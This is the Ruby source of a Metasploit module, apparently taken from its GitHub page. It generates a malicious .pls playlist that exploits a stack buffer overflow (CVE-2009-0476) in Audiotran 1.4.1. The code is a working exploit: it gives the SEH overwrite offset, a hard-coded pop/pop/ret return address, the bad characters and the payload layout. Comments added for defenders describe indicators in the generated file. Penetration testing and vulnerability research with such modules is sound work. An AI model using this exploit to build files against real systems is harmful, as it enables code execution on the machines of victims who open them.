rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/fileformat/audiotran_pls.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# File-format module for CVE-2009-0476: it writes a playlist (.pls) file that
# overflows a stack buffer in Audiotran 1.4.1 when the file is opened there.
#
# The exploit method below only builds one string and hands it to file_create;
# delivery of the file and the victim opening it happen outside this module.
#
# Triage notes for defenders, limited to what this file shows:
# * The generated file carries none of the usual playlist structure; its
#   content is a long run of random text around the payload (see #exploit).
# * The single target relies on one hard-coded address (see 'Targets').
# * Reliability, stability and side effects are declared as UNKNOWN_*.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  # Registers the module metadata and the FILENAME option.
  #
  # @param info [Hash] metadata passed in by the framework and merged with the
  #   values below through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Audiotran 1.4.1 (PLS File) Stack Buffer Overflow',
        'Description' => %q{
          This module exploits a stack-based buffer overflow in Audiotran 1.4.1.
          An attacker must send the file to victim and the victim must open the file.
          Alternatively it may be possible to execute code remotely via an embedded
          PLS file within a browser, when the PLS extension is registered to Audiotran.
          This functionality has not been tested in this module.
        },
        'License' => MSF_LICENSE,
        'Author' => ['Sebastien Duquette', 'dookie'],
        # Public identifiers for the flaw; use these when matching advisories.
        'References' => [
          ['CVE', '2009-0476'],
          ['OSVDB', '55424'],
          ['EDB', '11079']
        ],
        'Payload' => {
          'Space' => 6000,
          # Bytes the payload encoder must avoid: NUL, line feed and '='.
          'BadChars' => "\x00\x0a\x3d",
          'StackAdjustment' => -3500
        },
        'Platform' => 'win',
        'Targets' => [
          # Return address documented by the author as a pop/pop/ret sequence
          # in rsaadjd.tmp.
          # NOTE(review): "Universal" rests on this one fixed address; the
          # page lists no tested OS versions or product builds - confirm.
          ['Windows Universal', { 'Ret' => 0x10101A3E }]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2010-01-09',
        'DefaultTarget' => 0,
        # Placeholder values: none of the three properties is declared here, so
        # treat crash behaviour and leftover artifacts as unassessed.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # Required option: name of the file that #exploit writes.
    filename_opt = OptString.new('FILENAME', [true, 'The file name.', 'msf.pls'])
    register_options([filename_opt])
  end

  # Builds the file content and writes it out through file_create.
  #
  # Layout, in order: 1308 characters from rand_text_alpha_upper, the result of
  # generate_seh_payload for the selected target's return address, then 8000
  # more characters from rand_text_alpha_upper.
  def exploit
    pls_data = rand_text_alpha_upper(1308)
    seh_record = generate_seh_payload(target.ret)
    pls_data << seh_record
    pls_data << rand_text_alpha_upper(8000)

    out_name = datastore['FILENAME']
    print_status("Creating '#{out_name}' file ...")

    file_create(pls_data)
  end
end